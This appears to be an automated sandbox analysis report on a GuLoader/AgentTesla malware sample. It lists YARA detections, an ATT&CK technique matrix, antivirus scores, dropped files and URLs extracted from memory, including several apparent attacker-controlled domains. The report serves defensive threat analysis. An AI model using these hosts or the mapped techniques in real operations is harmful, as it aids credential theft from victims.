Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 3872, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 3872, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 LSASS Driver	1 LSASS Driver	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Native API	11 DLL Side-Loading	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Network Sniffing	2 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Command and Scripting Interpreter	22 Windows Service	1 Access Token Manipulation	2 Obfuscated Files or Information	1 Credentials in Registry	1 Network Sniffing	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	2 Service Execution	Logon Script (Mac)	22 Windows Service	1 Software Packing	NTDS	148 System Information Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	112 Process Injection	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 DLL Side-Loading	Cached Domain Credentials	371 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 File Deletion	DCSync	251 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	2 Masquerading	Proc Filesystem	2 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Modify Registry	/etc/passwd and /etc/shadow	1 Application Window Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	251 Virtualization/Sandbox Evasion	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Access Token Manipulation	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	112 Process Injection	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	31%	Virustotal		Browse
SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	22%	ReversingLabs	Win32.Downloader.GuLoader

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\HPSUPD-Win32Exe.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\lgpllibs.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\lgpllibs.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll	3%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Temp\vm3ddevapi64-debug.dll	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	0%	Metadefender	Browse
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\MpSigStub.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpasbase.vdm	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\2C39E2B2-9640-4516-B068-8044B49E3F95\mpasdlta.vdm	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	Virustotal		Browse
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	0%	Avira URL Cloud	safe
http://www.certplus.com/CRL/class3.crl0	0%	Virustotal		Browse
http://www.certplus.com/CRL/class3.crl0	0%	Avira URL Cloud	safe
http://ocsp.suscerte.gob.ve0	0%	Avira URL Cloud	safe
http://crl.dhimyotis.com/certignarootca.crl0	0%	Virustotal		Browse
http://crl.dhimyotis.com/certignarootca.crl0	0%	Avira URL Cloud	safe
http://www.chambersign.org1	0%	Avira URL Cloud	safe
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	0%	Avira URL Cloud	safe
http://crl.ssc.lt/root-c/cacrl.crl0	0%	Avira URL Cloud	safe
http://ca.disig.sk/ca/crl/ca_disig.crl0	0%	Avira URL Cloud	safe
http://www.suscerte.gob.ve/dpc0	0%	Avira URL Cloud	safe
http://www.disig.sk/ca/crl/ca_disig.crl0	0%	Avira URL Cloud	safe
http://policy.camerfirma.com0	0%	Avira URL Cloud	safe
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	0%	Avira URL Cloud	safe
https://owWZDyjXwQrXMrJH.org	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	Avira URL Cloud	safe
http://crl.ssc.lt/root-b/cacrl.crl0	0%	Avira URL Cloud	safe
http://microsoft.co	0%	Avira URL Cloud	safe
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	0%	Avira URL Cloud	safe
https://wwww.certigna.fr/autorites/0m	0%	Avira URL Cloud	safe
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	Avira URL Cloud	safe
https://owWZDyjXwQrXMrJH.or	0%	Avira URL Cloud	safe
http://passport.net/tb	0%	Avira URL Cloud	safe
http://www.globaltrust.info0	0%	Avira URL Cloud	safe
https://owWZDyjXwQrXMrJH.orgt-	0%	Avira URL Cloud	safe
http://ac.economia.gob.mx/last.crl0G	0%	Avira URL Cloud	safe
http://crl.oces.trust2408.com/oces.crl0	0%	Avira URL Cloud	safe
http://certs.oaticerts.com/repository/OATICA2.crl	0%	Avira URL Cloud	safe
http://certs.oati.net/repository/OATICA2.crt0	0%	Avira URL Cloud	safe
http://www.accv.es00	0%	Avira URL Cloud	safe
http://mail.asfaltolargo.pt(	0%	Avira URL Cloud	safe
http://OGHYwH.com	0%	Avira URL Cloud	safe
http://web.ncdc.gov.sa/crl/nrcaparta1.crl	0%	Avira URL Cloud	safe
http://www.acabogacia.org0	0%	Avira URL Cloud	safe
http://crl.securetrust.com/SGCA.crl0	0%	Avira URL Cloud	safe
http://www.agesic.gub.uy/acrn/acrn.crl0)	0%	Avira URL Cloud	safe
http://www.rcsc.lt/repository0	0%	Avira URL Cloud	safe
http://x1.c.lencr.org/0	0%	Avira URL Cloud	safe
http://x1.i.lencr.org/0	0%	Avira URL Cloud	safe
http://www.correo.com.uy/correocert/cps.pdf0	0%	Avira URL Cloud	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	Avira URL Cloud	safe
http://certs.oaticerts.com/repository/OATICA2.crt08	0%	Avira URL Cloud	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	Avira URL Cloud	safe
https://unitedstates4.ss.wd.microsoft.us	0%	Avira URL Cloud	safe
https://unitedstates1.ss.wd.microsoft.us	0%	Avira URL Cloud	safe
http://www.oaticerts.com/repository.	0%	Avira URL Cloud	safe
http://www.ancert.com/cps0	0%	Avira URL Cloud	safe
http://ocsp.accv.es0	0%	Avira URL Cloud	safe
http://crl.mV	0%	Avira URL Cloud	safe
http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0	0%	Avira URL Cloud	safe
http://www.echoworx.com/ca/root2/cps.pdf0	0%	Avira URL Cloud	safe
http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03	0%	Avira URL Cloud	safe
http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0	0%	Avira URL Cloud	safe
http://mail.asfaltolargo.pt	0%	Avira URL Cloud	safe
http://crl.defence.gov.au/pki0	0%	Avira URL Cloud	safe
http://www.agesic.gub.uy/acrn/cps_acrn.pdf0	0%	Avira URL Cloud	safe
http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel05	0%	Avira URL Cloud	safe
http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0	0%	Avira URL Cloud	safe
http://www.comsign.co.il/cps0	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0	CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.certplus.com/CRL/class3.crl0	CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.vmware.com/0	SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false		high
http://ocsp.suscerte.gob.ve0	CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601190951.000000002072C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.dhimyotis.com/certignarootca.crl0	CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0	CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.chambersign.org1	CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.swisssign.com/0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ssc.lt/root-c/cacrl.crl0	CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682774918.000000002073F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0	CasPol.exe, 00000005.00000003.19683625040.000000001F957000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253192039.000000001F95A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Azure/azure-storage-cpp)	mpam-60574f34.exe, 00000010.00000003.18740725593.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18740268669.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.suscerte.gob.ve/dpc0	CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601190951.000000002072C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.disig.sk/ca/crl/ca_disig.crl0	CasPol.exe, 00000005.00000003.19683625040.000000001F957000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253192039.000000001F95A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pki.registradores.org/normativa/index.htm0	CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	false		high
http://policy.camerfirma.com0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.anf.es/es/address-direccion.html	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.anf.es/address/)1(0&	CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?	CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://owWZDyjXwQrXMrJH.org	CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23246237802.000000001D9BE000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.letsencrypt.org0	CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23255549826.000000002079C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ssc.lt/root-b/cacrl.crl0	CasPol.exe, 00000005.00000003.18600919578.0000000020866000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://microsoft.co	MpSigStub.exe, 00000013.00000003.18808585691.000001F8CEA95000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000002.18818438522.000001F8CEA95000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.certicamara.com/dpc/0Z	CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.wellsfargo.com/wsprca.crl0	CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wwww.certigna.fr/autorites/0m	CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0	CasPol.exe, 00000005.00000003.18600919578.0000000020866000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/msangcwam	svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976530622.000002C168D29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://owWZDyjXwQrXMrJH.or	CasPol.exe, 00000005.00000002.23245577235.000000001D986000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.anf.es/AC/ANFServerCA.crl0	CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://passport.net/tb	svchost.exe, 0000001D.00000002.23220485437.000002C1682B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.globaltrust.info0	CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false		high
https://owWZDyjXwQrXMrJH.orgt-	CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://ac.economia.gob.mx/last.crl0G	CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0g-34-docs.googleusercontent.com/	CasPol.exe, 00000005.00000003.18459747894.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23219964862.0000000001367000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false		high
http://crl.oces.trust2408.com/oces.crl0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://eca.hinet.net/repository0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://certs.oaticerts.com/repository/OATICA2.crl	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certs.oati.net/repository/OATICA2.crt0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.accv.es00	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/V%-	CasPol.exe, 00000005.00000002.23219609628.000000000132B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mail.asfaltolargo.pt(	CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://OGHYwH.com	CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://web.ncdc.gov.sa/crl/nrcaparta1.crl	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.datev.de/zertifikat-policy-int0	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/open-source-parsers/jsoncpp.git)	mpam-60574f34.exe, 00000010.00000003.18740725593.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18740268669.0000016C07975000.00000004.00000020.00020000.00000000.sdmp, mpam-60574f34.exe, 00000010.00000003.18737392209.0000016C07BA1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.acabogacia.org0	CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.firmaprofesional.com/cps0	CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682296383.0000000020824000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/SGCA.crl0	CasPol.exe, 00000005.00000003.18601190951.000000002072C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.agesic.gub.uy/acrn/acrn.crl0)	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rcsc.lt/repository0	CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682472622.000000002083C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://web.certicamara.com/marco-legal0Z	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.quovadisglobal.com/cps0	CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	CasPol.exe, 00000005.00000002.23255092763.0000000020728000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.i.lencr.org/0	CasPol.exe, 00000005.00000002.23255092763.0000000020728000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.correo.com.uy/correocert/cps.pdf0	CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	CasPol.exe, 00000005.00000002.23244260810.000000001D881000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://certs.oaticerts.com/repository/OATICA2.crt08	CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://signup.live.com/signup.aspx	svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.23221533613.000002C168D37000.00000004.00000020.00020000.00000000.sdmp	false		high
http://cps.chambersign.org/cps/chambersignroot.html0	CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://unitedstates4.ss.wd.microsoft.us	NisSrv.exe.16.dr	false	Avira URL Cloud: safe	unknown
https://clients2.google.com/service/check2?crx3=true&appid=%7B430FD4D0-B729-4F61-AA34-91526481799D%7	edb.log.4.dr	false		high
https://unitedstates1.ss.wd.microsoft.us	NisSrv.exe.16.dr	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80601	svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.anf.es/AC/RC/ocsp0c	CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80600	svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.live.com/inlinesignup.aspx?iww=1&id=80603	svchost.exe, 0000001D.00000002.23219818127.000002C168241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21977267020.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.21976659587.000002C168D2C000.00000004.00000020.00020000.00000000.sdmp	false		high
